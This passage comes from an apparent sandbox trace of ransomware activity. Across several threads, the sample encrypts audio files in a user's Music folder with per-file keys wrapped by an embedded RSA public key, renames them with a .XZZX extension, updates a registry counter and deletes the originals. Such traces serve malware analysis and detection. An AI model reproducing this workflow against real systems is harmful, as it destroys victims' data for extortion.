dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0118.584] CryptExportKey (in: hKey=0x3a5710, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0118.584] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.585] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0118.585] CryptDestroyKey (hKey=0x3a5710) returned 1 [0118.585] CryptReleaseContext (hProv=0x3cc64c0, dwFlags=0x0) returned 0 [0118.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\663067DE2A526ACA340DE0352E734F12.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\663067de2a526aca340de0352e734f12.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0118.585] WriteFile (in: hFile=0x568, lpBuffer=0x3cc9980*, nNumberOfBytesToWrite=0x9008, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc9980*, lpNumberOfBytesWritten=0x420e438*=0x9008, lpOverlapped=0x0) returned 1 [0118.586] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9008 [0118.586] WriteFile (in: hFile=0x568, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.586] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x900d [0118.586] WriteFile (in: hFile=0x568, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2c, lpOverlapped=0x0) returned 1 [0118.586] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9039 [0118.586] WriteFile (in: hFile=0x568, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.586] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x903e [0118.587] SetErrorMode (uMode=0x1) returned 0x1 [0118.587] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0118.587] OutputDebugStringW (lpOutputString="end") [0118.587] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0118.587] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0118.587] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc6548) returned 1 [0118.588] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6548, dwCertEncodingType=0x1, pInfo=0x3cb0f48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0f78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0f80*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5710) returned 1 [0118.588] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.588] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0118.588] CryptEncrypt (in: hKey=0x3a5710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0118.588] CryptEncrypt (in: hKey=0x3a5710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc65d0*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc65d0*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0118.588] WriteFile (in: hFile=0x568, lpBuffer=0x3cc65d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc65d0*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0118.588] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0118.588] WriteFile (in: hFile=0x568, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0118.589] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0118.589] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0118.589] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x574) returned 0x0 [0118.589] RegQueryValueExW (in: hKey=0x574, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x73, lpcbData=0x420dfdc*=0x4) returned 0x0 [0118.589] RegCloseKey (hKey=0x574) returned 0x0 [0118.589] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x574) returned 0x0 [0118.589] RegSetValueExW (in: hKey=0x574, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x74, cbData=0x4 | out: lpData=0x420dfec*=0x74) returned 0x0 [0118.589] RegCloseKey (hKey=0x574) returned 0x0 [0118.589] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.590] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.590] CloseHandle (hObject=0x568) returned 1 [0118.591] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0118.591] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0118.592] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\OPPnhBe-ZTrVhEG421.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\oppnhbe-ztrvheg421.wav")) returned 1 [0118.592] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\OPPnhBe-ZTrVhEG421.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\oppnhbe-ztrvheg421.wav")) returned 0 Thread: id = 380 os_tid = 0x8f8 [0118.540] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.540] lstrcpyW (in: lpString1=0x434f460, lpString2="WWsZT9B6tKUn2DClW.mp3" | out: lpString1="WWsZT9B6tKUn2DClW.mp3") returned="WWsZT9B6tKUn2DClW.mp3" [0118.540] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.540] SetErrorMode (uMode=0x1) returned 0x1 [0118.540] lstrcpyW (in: lpString1=0x434f860, lpString2="WWsZT9B6tKUn2DClW.mp3" | out: lpString1="WWsZT9B6tKUn2DClW.mp3") returned="WWsZT9B6tKUn2DClW.mp3" [0118.540] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xc8bf560f, Data2=0x91c1, Data3=0x49df, Data4=([0]=0xaa, [1]=0xbb, [2]=0x1c, [3]=0x1a, [4]=0x79, [5]=0xa3, [6]=0x4a, [7]=0xcd))) returned 0x0 [0118.540] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\WWsZT9B6tKUn2DClW.mp3") returned 94 [0118.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0118.540] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B7FE604F2A0F001FC8BF560F2E43E467.XZZX") returned 110 [0118.540] StrStrW (lpFirst="WWsZT9B6tKUn2DClW.mp3", lpSrch="XZZX") returned 0x0 [0118.540] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\WWsZT9B6tKUn2DClW.mp3", dwFileAttributes=0x20) returned 1 [0118.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\WWsZT9B6tKUn2DClW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\wwszt9b6tkun2dclw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0118.541] ReadFile (in: hFile=0x568, lpBuffer=0x3cd2990, nNumberOfBytesToRead=0x3400, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3cd2990*, lpNumberOfBytesRead=0x434e418*=0x3400, lpOverlapped=0x0) returned 1 [0118.542] CloseHandle (hObject=0x568) returned 1 [0118.542] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0118.543] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0118.543] SetErrorMode (uMode=0x1) returned 0x1 [0118.543] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0118.543] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc64c0) returned 1 [0118.546] CryptGenKey (in: hProv=0x3cc64c0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5a10) returned 1 [0118.691] CryptExportKey (in: hKey=0x3a5a10, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0118.691] CryptExportKey (in: hKey=0x3a5a10, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0118.691] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.692] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0118.692] CryptDestroyKey (hKey=0x3a5a10) returned 1 [0118.692] CryptReleaseContext (hProv=0x3cc64c0, dwFlags=0x0) returned 0 [0118.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\B7FE604F2A0F001FC8BF560F2E43E467.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\b7fe604f2a0f001fc8bf560f2e43e467.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x564 [0118.693] WriteFile (in: hFile=0x564, lpBuffer=0x3cd2990*, nNumberOfBytesToWrite=0x3400, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cd2990*, lpNumberOfBytesWritten=0x434e438*=0x3400, lpOverlapped=0x0) returned 1 [0118.693] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3400 [0118.693] WriteFile (in: hFile=0x564, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0118.693] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3405 [0118.694] WriteFile (in: hFile=0x564, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x2a, lpOverlapped=0x0) returned 1 [0118.694] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x342f [0118.694] WriteFile (in: hFile=0x564, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0118.694] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3434 [0118.694] SetErrorMode (uMode=0x1) returned 0x1 [0118.694] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0118.694] OutputDebugStringW (lpOutputString="end") [0118.694] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0118.694] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0118.694] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cc6658) returned 1 [0118.695] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6658, dwCertEncodingType=0x1, pInfo=0x3cb03e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb0418*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb0420*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3a5a10) returned 1 [0118.695] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0118.695] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0118.696] CryptEncrypt (in: hKey=0x3a5a10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0118.696] CryptEncrypt (in: hKey=0x3a5a10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc66e0*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc66e0*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0118.696] WriteFile (in: hFile=0x564, lpBuffer=0x3cc66e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc66e0*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0118.696] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0118.696] WriteFile (in: hFile=0x564, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0118.696] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0118.696] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0118.696] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x568) returned 0x0 [0118.696] RegQueryValueExW (in: hKey=0x568, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x74, lpcbData=0x434dfdc*=0x4) returned 0x0 [0118.696] RegCloseKey (hKey=0x568) returned 0x0 [0118.696] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x568) returned 0x0 [0118.696] RegSetValueExW (in: hKey=0x568, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x75, cbData=0x4 | out: lpData=0x434dfec*=0x75) returned 0x0 [0118.697] RegCloseKey (hKey=0x568) returned 0x0 [0118.697] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.697] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.697] CloseHandle (hObject=0x564) returned 1 [0118.699] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0118.699] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0118.699] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\WWsZT9B6tKUn2DClW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\wwszt9b6tkun2dclw.mp3")) returned 1 [0118.700] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\WWsZT9B6tKUn2DClW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\wwszt9b6tkun2dclw.mp3")) returned 0 Thread: id = 381 os_tid = 0x8fc [0118.701] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0118.701] lstrcpyW (in: lpString1=0x420f460, lpString2="xN7YDKwcce9C5peK.mp3" | out: lpString1="xN7YDKwcce9C5peK.mp3") returned="xN7YDKwcce9C5peK.mp3" [0118.701] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0118.701] SetErrorMode (uMode=0x1) returned 0x1 [0118.701] lstrcpyW (in: lpString1=0x420f860, lpString2="xN7YDKwcce9C5peK.mp3" | out: lpString1="xN7YDKwcce9C5peK.mp3") returned="xN7YDKwcce9C5peK.mp3" [0118.701] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x7503b149, Data2=0xcc6e, Data3=0x458b, Data4=([0]=0xb1, [1]=0xaa, [2]=0xb9, [3]=0xf5, [4]=0x99, [5]=0x64, [6]=0xf7, [7]=0x7b))) returned 0x0 [0118.701] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\xN7YDKwcce9C5peK.mp3") returned 93 [0118.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0118.701] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\38DC595E3788A5BA7503B1493BA98A02.XZZX") returned 110 [0118.701] StrStrW (lpFirst="xN7YDKwcce9C5peK.mp3", lpSrch="XZZX") returned 0x0 [0118.701] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\xN7YDKwcce9C5peK.mp3", dwFileAttributes=0x20) returned 1 [0118.702] CreateFileW 